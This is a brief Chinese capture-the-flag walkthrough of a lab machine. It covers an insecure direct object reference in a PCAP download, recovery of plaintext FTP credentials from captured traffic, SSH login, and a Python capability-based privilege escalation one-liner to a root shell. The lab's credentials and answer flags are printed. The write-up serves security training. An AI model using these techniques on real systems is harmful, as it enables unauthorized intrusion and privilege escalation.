靶场地址:10.129.164.211
访问80端口
目录爆破
点击 Security Snapshot(5 Second PCAP + Analysis )
可以下载1.pcap wireshark文件
内容为流量,使用wireshark打开
点击 IP Config
猜测功能为 ipconfig 命令
点击 Network Status
功能类似于netstat
点击 Security Snapshot(5 Second PCAP + Analysis )
将http://10.129.164.211/data/2 改为 http://10.129.164.211/data/0
下载
wireshark打开
过滤端口为21
tcp.port == 21
获得一组ftp账号密码
nathan/Buck3tH4TF0RM3!
ftp登录
成功登录
获取普通用户flag
5483633d589793f770ea6cfd5d3a4fde
尝试用此账号登录SSH
nathan/Buck3tH4TF0RM3!
ssh nathan@10.129.164.211
成功登录
查看权限
提权
查看设置了capabilities的可执行文件(参考 http://www.hackdig.com/09/hack-768344.htm)
getcap -r / 2>/dev/null
使用 python提权
python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
成功获取root权限
把shell升级为TTY, tty命令用于显示终端机连接标准输入设备的文件名称
SHELL=/bin/bash script -q /dev/null
成功获取到管理员flag
877ef2ded1c127c73b3b8be881162ed3